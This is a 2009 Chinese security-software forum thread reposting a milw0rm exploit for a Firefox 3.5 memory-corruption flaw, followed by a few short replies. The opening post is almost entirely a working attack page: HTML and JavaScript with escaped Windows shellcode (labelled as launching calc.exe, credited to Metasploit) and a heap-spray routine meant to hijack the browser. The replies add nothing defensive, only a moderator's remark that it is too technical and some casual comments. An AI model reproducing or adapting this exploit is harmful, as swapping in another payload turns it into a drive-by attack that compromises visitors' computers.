设为首页收藏本站
切换到宽版

巨盾安全论坛

 找回密码
 欢迎注册

QQ登录

只需一步,快速开始

巨盾安全论坛 论坛 ↑ 会员专区 ↑ [安软讨论] Mozilla Firefox 3.5 Remote Buffer Overflow Exploit ( ...
返回列表 发新帖回复
查看: 1612|回复: 5

Mozilla Firefox 3.5 Remote Buffer Overflow Exploit (untested crash) [复制链接]

小西瓜

Rank: 7Rank: 7Rank: 7

盾币
364
盾分
0
在线时间
743 小时
最后登录
2012-5-9
主题
14
精华
1
帖子
313
发表于 2009-7-14 22:21:30 |显示全部楼层
from milw0rm.com [2009-07-13]


  2. <html>
  3. <head>
  4. <title>Firefox 3.5 Vulnerability</title>
  5. Firefox 3.5 Heap Spray Vulnerabilty
  6. </br>
  7. Author: SBerry aka Simon Berry-Byrne
  8. </br>
  9. Thanks to HD Moore for the insight and Metasploit for the payload
  10. <div id="content">
  11. <p>
  12. <FONT>
  13. </FONT>
  14. </p>
  15. <p>
  16. <FONT>Loremipsumdoloregkuw</FONT></p>
  17. <p>
  18. <FONT>Loremipsumdoloregkuwiert</FONT>
  19. </p>
  20. <p>
  21. <FONT>Loremikdkw  </FONT>
  22. </p>
  23. </div>
  24. <script language=JavaScript>

  26. /* Calc.exe */
  27. var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
  28.                        "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
  29.                        "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
  30.                        "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
  31.                        "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
  32.                        "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
  33.                        "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
  34.                        "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
  35.                        "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
  36.                        "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
  37.                        "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
  38.                        "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
  39.                        "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
  40.                        "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
  41.                        "%u652E%u6578%u9000");
  42. /* Heap Spray Code */
  43. oneblock = unescape("%u0c0c%u0c0c");
  44. var fullblock = oneblock;
  45. while (fullblock.length<0x60000)
  46. {
  47.     fullblock += fullblock;
  48. }
  49. sprayContainer = new Array();
  50. for (i=0; i<600; i++)
  51. {
  52.     sprayContainer[i] = fullblock + shellcode;
  53. }
  54. var searchArray = new Array()

  56. function escapeData(data)
  57. {
  58. var i;
  59. var c;
  60. var escData='';
  61. for(i=0;i<data.length;i++)
  62.   {
  63.    c=data.charAt(i);
  64.    if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
  65.    escData+=c;
  66.   }
  67. return escData;
  68. }

  70. function DataTranslator(){
  71.     searchArray = new Array();
  72.     searchArray[0] = new Array();
  73.     searchArray[0]["str"] = "blah";
  74.     var newElement = document.getElementById("content")
  75.     if (document.getElementsByTagName) {
  76.         var i=0;
  77.         pTags = newElement.getElementsByTagName("p")
  78.         if (pTags.length > 0)
  79.         while (i<pTags.length)
  80.         {
  81.             oTags = pTags[i].getElementsByTagName("font")
  82.             searchArray[i+1] = new Array()
  83.             if (oTags[0])
  84.             {
  85.                 searchArray[i+1]["str"] = oTags[0].innerHTML;
  86.             }
  87.             i++
  88.         }
  89.     }
  90. }

  92. function GenerateHTML()
  93. {
  94.     var html = "";
  95.     for (i=1;i<searchArray.length;i++)
  96.     {
  97.         html += escapeData(searchArray[i]["str"])
  98.     }
  99. }
  100. DataTranslator();
  101. GenerateHTML()
  102. </script>
  103. </body>
  104. </html>
  105. <html><body></body></html>
复制代码
回复

举报

华军测评保护账号安全 巨盾网游安全盾
Sagittarius

Rank: 8Rank: 8Rank: 8Rank: 8

盾币
1691
盾分
0
在线时间
3400 小时
最后登录
2012-5-19
主题
53
精华
5
帖子
1464

优秀斑竹

发表于 2009-7-14 22:24:52 |显示全部楼层
本帖最后由 Sagittarius 于 2009-7-14 22:26 编辑

这个不适合放这边。。不想做技术论坛。。
西瓜以后放些浅些,易懂的。便于平民化。的。。
勤勤恳恳做事,安安静静做人
回复

举报

小西瓜

Rank: 7Rank: 7Rank: 7

盾币
364
盾分
0
在线时间
743 小时
最后登录
2012-5-9
主题
14
精华
1
帖子
313
发表于 2009-7-14 22:28:07 |显示全部楼层
这个不适合放这边。。不想做技术论坛。。
西瓜以后放些浅些,易懂的。便于平民化。的。。
Sagittarius 发表于 2009-7-14 22:24


这世道IE才出了0day,Firefox也来凑热闹
回复

举报

softsing

Rank: 1

盾币
520
盾分
0
在线时间
436 小时
最后登录
2010-8-24
主题
23
精华
0
帖子
483
发表于 2009-12-5 02:25:13 |显示全部楼层
杀木马用巨盾,用了都说好!
回复

举报

efgh074
头像被屏蔽

禁止发言

盾币
4
盾分
0
在线时间
0 小时
最后登录
2009-12-23
主题
0
精华
0
帖子
4
发表于 2009-12-5 15:16:38 |显示全部楼层

人言可畏啊!

提示: 作者被禁止或删除 内容自动屏蔽
回复

举报

在我脚下

Rank: 1

盾币
343
盾分
0
在线时间
237 小时
最后登录
2011-6-24
主题
101
精华
0
帖子
201
发表于 2009-12-5 17:22:36 |显示全部楼层
很强,但是看不懂。
回复

举报

返回列表 发新帖 回复
验证问答 换一个 验证码 换一个

防盗号用巨盾!巨盾是一款针对木马查杀、在线娱乐安全设计的产品,最受网游用户和上网冲浪用户的欢迎。永久免费,使用方便,查杀迅速,小巧轻便。

Archiver|巨盾安全实验室 [防盗号用巨盾,安全玩游戏] ( 沪ICP备09050605号 )  

GMT+8, 2012-5-22 07:04 , Processed in 0.057391 second(s), 15 queries .

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部